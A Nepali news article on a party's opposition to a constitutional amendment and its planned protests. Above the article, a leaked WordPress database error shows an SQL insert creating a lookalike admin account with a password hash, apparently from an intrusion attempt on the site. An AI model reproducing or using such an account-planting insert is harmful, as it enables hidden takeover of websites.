WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BQ4iiiZS0RQYzSVRbmmKM0w416/WIK.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-30 09:23:21', '', 'admlnlx', 'admlnlx')
मोरङ, मंसिर १८–
राजकुमार लेखी नेतृत्वको नागरिक समाजवादी पार्टीले सरकारले दर्ता गराएको संविधान संसोधन प्रस्तावको बिरोध गरेको छ ।
आज (शनिबार) मोरङको मोरङको बिराटनगरमा पत्रकार सम्मेलन गरि संविधान संशोधनको विरोध जनाएको हो ।
पार्टीका अध्यक्ष लेखीले अहिलेको संसोधन प्रस्ताव थारु, आदिवासी–जनजाति, मधेसी, मुस्लिमको अधिकार नसमेटी बेवकुफ र उल्लु बनाउने मात्रै नियतले ल्याईएको भन्दै यस्तो प्रस्ताव मान्य नहुने बताउनुभयो ।
उहाँले भन्नुभयो–“तराइको भुमीपुत्र थारू, आदिवासी÷जनजाति, मधेसी, मुस्लिमका माँगहरू सिमाङकन, राज्यको हरेक तह तप्कामा समानुपातिक समावेशी, आदिवासी जनजातिहरूको अधिकारहरू समेटिएको छैन, यो सोझा साझा थारुहरुलाई बेवकुफ र उल्लु बनाउने नियतले ल्याएको हो। त्यसकारण यो संशोधनको प्रस्ताव प्रतिगामी रहेको छ ।”
उहाँले पार्टीले उठाउँदै आएको थरूहट स्वायत प्रदेशमा कैलाली र कन्चनपुर जिल्लालाई जोडनु पर्ने र झापा, मोरङ, सुनसरी र उदयपुरका त्रियुगा क्षेत्रलाई पुर्वको प्रदेशमा जोडनुपर्ने मागलाई वेवास्ता गरी एकलौटीरूपमा त्यहाँको जनताहरुको कुरा नबुझी ल्याएको संशोधन प्रस्ताव प्रति गम्भिर ध्यानाकर्षण भएको बताउनुभयो । नेता लेखीले आउँदो पुष ६ गतेबाट पार्टी आन्दोलनमा जाने समेत चेतावनी दिनुभयो । विभिन्न माग राख्दै सो दिनदेखि चक्का जाम गर्ने कार्यक्रम रहेको अध्यक्ष लेखीले जानकारी दिनुभयो । नागरिक समाजवादी पार्टीले राज्य पुर्नसंरचना तथा स्रोत बाडफाड आयोगको प्रतीबेदनले सिफारिस गरेको तराइमा दुई प्रदेश सुनिश्चित गर्नुपर्ने, टीकापुर घटनाका निर्दोष राजबन्दीहरुलाई बिना शर्त सिहाइ तथा घटनामा क्षती भएका सम्पतीहरुको क्षतीपुर्तीको ब्यवस्था गर्नुपर्ने, जातीय जनसंख्याको आधारमा राज्यको हरेक तह ,तप्कामा समानुपातिक समावेशी प्रतीनिधित्व सुनिश्चित गर्नुपर्ने, थरुहट तराइमा थारु भाषालाई सरकारी कामकाजको भाषा घोषणा गर्नुपर्ने माग राखेको छ ।
यही माग राखेर उसले चरणबद्ध आन्दोलनको घोषणा समेत गरेको छ ।
जस अनुसार यही मंसिर २० देखि २६ गतेसम्म जिल्ला प्रशासन कार्यालयमा ज्ञापनपत्र बुझाउने, पुस ५ गते मंगलबार टोल, गाउँ सडकमा मसाल जुलुस निकाल्ने, पुस ६ गते थरुहट तराइमा चक्काजाम गर्ने कार्यक्रम रहेको छ ।